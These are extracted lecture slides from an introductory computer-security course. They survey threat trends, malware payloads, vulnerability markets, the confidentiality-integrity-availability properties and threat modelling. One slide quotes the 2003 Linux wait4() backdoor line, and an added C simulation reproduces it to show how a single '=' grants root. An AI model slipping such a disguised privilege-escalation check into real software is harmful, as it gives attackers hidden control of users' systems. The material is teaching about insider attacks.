Security Analysis & Threat Models - Dawn Song (PowerPoint presentation)

SLIDE 1

Dawn Song

Introduction

Security Analysis & Threat Models

SLIDE 2

Logistics

  • Sessions

– You can go to any session

  • Project groups

– You can switch groups for different projects

  • Wait List

SLIDE 3

Evolving Threats

SLIDE 4

Exploration, Disruption, Personal Reputation

  • 1990s:

– Phone phreaking, free calls

  • Early 2000s:

– Email worms – CodeRed, MyDoom, Sobig

SLIDE 5

Financially Motivated

  • Shift in late 2000s
  • Spam

– Pharmaceuticals – Fake products

  • Carding/Fraud

– Identity theft, credit fraud

SLIDE 6

Politically Motivated

  • Advanced Persistent Threats (APT)

  • Stuxnet, Flame, Gauss

– Iranian nuclear infrastructure – Lebanese banking information

SLIDE 7

Politically Motivated

SLIDE 8

Other Motives?

SLIDE 9

Threats Statistics

SLIDE 10

MITRE tracks vulnerability disclosures

Data: http://www.cvedetails.com/browse-by-date.php

[Chart: # of Vulnerabilities (CVE IDs) per year; the extracted axis label shows 2010]

[Pie chart: # of CVEs by Type. Categories: DoS, Code Execution, Overflow, Memory Corruption, Sql Injection, XSS, Directory Traversal, Http Response Splitting, Bypass something, Gain Information, Gain Privileges, CSRF, File Inclusion. Slice values as extracted: 17%, 26%, 12%, 3%, 8%, 11%, 3%, 0%, 4%, 7%, 4%, 1%, 3%]

SLIDE 11

Trends in client-side vulnerabilities

Source: IBM X-Force, Mar 2013

SLIDE 12

FireEye Advanced Threat Report 2013

SLIDE 13

IBM X-Force 2013

SLIDE 14

Mobile Threats on the Rise

SLIDE 15

Payloads---Why Attackers Compromise Machines and What Do They Do?

SLIDE 16

I: IP address and bandwidth stealing

Attacker’s goal: look like a random Internet user
Use the infected machine’s IP address for:

  • Spam (e.g. the storm botnet)
  • Denial of Service:
  • Click fraud (e.g. Clickbot.a)

SLIDE 17

II: Steal user credentials

Keylog for banking passwords, web passwords, gaming passwords. Example: SilentBanker (2007)

[Diagram: user, bank and malware interaction]
  • User requests login page
  • Bank sends login page needed to log in
  • Malware injects Javascript
  • When user submits information, also sent to attacker

Similar mechanism used by Zeus botnet

SLIDE 18

III: Spread to isolated systems

Example: Stuxnet
Windows infection ⇒ Siemens PCS 7 SCADA control software on Windows ⇒ Siemens device controller on isolated network
More on this later in course

SLIDE 19

Server-side attacks

  • Financial data theft: often credit card numbers

– example: malicious software installed on servers of a single retailer stole 45M credit card numbers (2007)

  • Political motivation: The Sony Hack (2014), Aurora, Tunisia Facebook (Feb. 2011)

  • Infect visiting users

SLIDE 20

Insider attacks: example

Hidden trap door in Linux (Nov 2003)

– Allows attacker to take over a computer
– Really subtle change (uncovered via CVS logs)

Inserted a line in wait4():

    if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
        retval = -EINVAL;

See: http://lwn.net/Articles/57135/
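The trap door line above, as an added stand-alone C simulation that is neither kernel source nor the slides' own code: it runs the back-doored condition next to the innocent comparison it imitates, so the effect of the single '=' is visible. 'struct task', the function names and the uid values are constructed stand-ins for the kernel's current->uid.

```c
/* Added simulation of the 2003 wait4() trap door (not kernel source and not
 * the slides' code). 'struct task' and the uid values are constructed
 * stand-ins for the kernel's current->uid. */
#include <errno.h>
#include <stdio.h>

#define __WCLONE 0x80000000u   /* wait option flags, values from linux/wait.h */
#define __WALL   0x40000000u

struct task { unsigned int uid; };   /* stand-in for the kernel's 'current' */

/* The inserted line as it appeared in the CVS tree. The single '=' assigns 0
 * (root) to uid and evaluates to 0, so the whole condition is false: retval
 * stays 0 and the caller continues, now running as uid 0. The extra
 * parentheses around the assignment also silence the usual compiler hint
 * ("suggest parentheses around assignment used as truth value"), which is
 * why review of the change history, not the compiler, caught it. */
int wait4_check_backdoored(struct task *current, unsigned int options)
{
    int retval = 0;
    if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
        retval = -EINVAL;
    return retval;
}

/* The harmless check it was disguised as: reject the bogus option
 * combination for root without ever writing to uid. */
int wait4_check_intended(struct task *current, unsigned int options)
{
    int retval = 0;
    if ((options == (__WCLONE|__WALL)) && (current->uid == 0))
        retval = -EINVAL;
    return retval;
}

int main(void)
{
    struct task t = { 1000 };            /* an ordinary, unprivileged user */
    int r = wait4_check_backdoored(&t, __WCLONE|__WALL);
    printf("backdoored: retval=%d uid=%u\n", r, t.uid);   /* retval=0 uid=0 */

    t.uid = 1000;
    r = wait4_check_intended(&t, __WCLONE|__WALL);
    printf("intended:   retval=%d uid=%u\n", r, t.uid);   /* retval=0 uid=1000 */
    return 0;
}
```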

SLIDE 21

Many more examples

  • Access to SIPRnet and a CD-RW: 260,000 cables ⇒ Wikileaks
  • SysAdmin for city of SF government: changed passwords, locking out city from router access
  • Insider logic bomb took down 2000 UBS servers

SLIDE 22

Monetization

SLIDE 23

Marketplace for Vulnerabilities

Option 1: bug bounty programs

  • Google Vulnerability Reward Program: $100-20,000
  • Mozilla Bug Bounty program: 3K$
  • Pwn2Own competition: 15K $
  • Github, HackerOne …

Option 2:

  • ZDI, iDefense: 2K – 25K $

SLIDE 24

Marketplace for Vulnerabilities

Option 3: black market

Source: Charlie Miller (securityevaluators.com/files/papers/0daymarket.pdf)

SLIDE 25

Marketplace for owned machines

Pay-per-install (PPI) services

PPI operation:
  1. Own victim’s machine
  2. Download and install client’s code
  3. Charge client

Source: Caballero et al. (www.icir.org/vern/papers/ppi-usesec11.pdf)

[Diagram: clients (spam bot, keylogger) → PPI service → victims]

SLIDE 26

Marketplace for owned machines

Source: Caballero et al. (www.icir.org/vern/papers/ppi-usesec11.pdf)

[Diagram: clients (spam bot, keylogger) → PPI service → victims]

Cost:
  • US: 100-180$ / 1000 machines
  • Asia: 7-8$ / 1000 machines

SLIDE 27

Why Is Security Hard?

Two factors:

  • Lots of buggy software (and gullible users)
  • Money can be made from finding and exploiting vulnerabilities

  1. Marketplace for vulnerabilities and exploits
  2. Marketplace for owned machines (PPI)
  3. Many methods to profit from owned client machines

SLIDE 28

Formally Defining Security

SLIDE 29

What is Computer Security About?

  • General goals:

– Allow intended use of computer systems
– Prevent unintended use that may cause harm

  • More precisely…

SLIDE 30

Basic Security Properties (I)

  • Confidentiality:

– Information is only disclosed to authorized people or systems
– E.g., attackers cannot learn your banking info

SLIDE 31

Basic Security Properties (II)

  • Integrity:

– Information cannot be tampered with in an unauthorized way
– E.g., attacker cannot change the balance of your bank account

SLIDE 32

Basic Security Properties (III)

  • Availability:

– Information and services are accessible in a timely fashion to authorized people or systems
– E.g., you should be able to log in and perform transactions on your online banking account when you want to

SLIDE 33

Basic Security Properties: CIA

  • Confidentiality
  • Integrity
  • Availability

SLIDE 34

Security Analysis

  • Given a computer system, one may ask:

Is the computer system secure?

SLIDE 35

Is the House Secure?

SLIDE 36

It Depends …

  • What are the assets? What are the goals?

SLIDE 37

It Depends …

  • Threat model

– In SafeLand, you don’t need to lock the door
– Attackers who pick locks
– Attackers who drive a bull-dozer
– Attackers who have super advanced technology
– Attackers who may know you well

SLIDE 38

Is the House Secure?

  • Is the house’s protection mechanism strong enough to protect the assets from attackers in a certain threat model?

SLIDE 39

Which Threat Model Should You Choose?

?

SLIDE 40

Cost of Security

  • Should you always build & evaluate a system secure against the strongest attacker?

– A student may simply not be able to afford an alarm system

  • Not about perfect security

[Spectrum: Perfect Security ↔ Risk Analysis]

SLIDE 41

Is the Computer System Secure?

  • Is the system’s protection mechanism strong enough to protect the assets & achieve security goals against attackers in a certain threat model?

SLIDE 42

Key Elements to Security Analysis

[Diagram: Security properties + Threat Model → ? → Security Analysis]

SLIDE 43

Threat Model

  • Assumptions on attackers’ abilities and resources

[Examples: 0Day, DDoS, Network Eavesdropper, MITM Attack, DES Cracker]

SLIDE 44

Which Threat Models to Choose?

  • For the grade database system for your class?
  • For your phone?
  • For a major online banking site?
  • For the system to control nuclear weapon launch?

SLIDE 45

Cost of Security

  • There’s no free lunch.
  • There’s no free security.
  • Cost of security

– Expensive to develop
– Performance overhead
– Inconvenience to users

SLIDE 46

Prioritize Your Security Solution according to Your Threat Model

  • No one wants to pay more for security than what they have to lose

  • Not about perfect security

– Risk analysis

[Spectrum: Perfect Security ↔ Risk Analysis]

SLIDE 47

Changing Threat Model

  • Be careful when your threat model changes

– E.g., online account

New account, nothing of value; No incentive for attackers

Over time…

Account accumulates value; More incentive for attackers

SLIDE 48

Design Impacts Cost of Security

  • Good system design & architecture can reduce cost of security

SLIDE 49

Design Impacts Cost of Security

Table: Browser vs. known unpatched vulnerabilities (number / oldest)
Columns: Secunia - Extremely critical, Highly critical, Moderately critical, Less critical, Not critical; SecurityFocus - Total

Values as extracted (number / oldest date), in the order they appear in each row:
  • Google Chrome 16: 1 / 13 December 2011
  • Internet Explorer 6: 4 / 17 November 2004; 8 / 27 February 2004; 12 / 5 June 2003; 534 / 20 November 2000
  • Internet Explorer 7: 1 / 30 October 2006; 4 / 6 June 2006; 9 / 5 June 2003; 213 / 15 August 2006
  • Internet Explorer 8: 1 / 26 February 2007; 7 / 5 June 2003; 123 / 14 January 2009
  • Internet Explorer 9: 1 / 6 December 2011; 26 / 5 March 2011
  • Firefox 3.6: 1 / 20 December 2011
  • Firefox 9

Sources: "Vulnerabilities." SecurityFocus. Web. 18 Jan. 2012. <http://www.securityfocus.com/>. "Advisories." Secunia. Web. 18 Jan. 2012.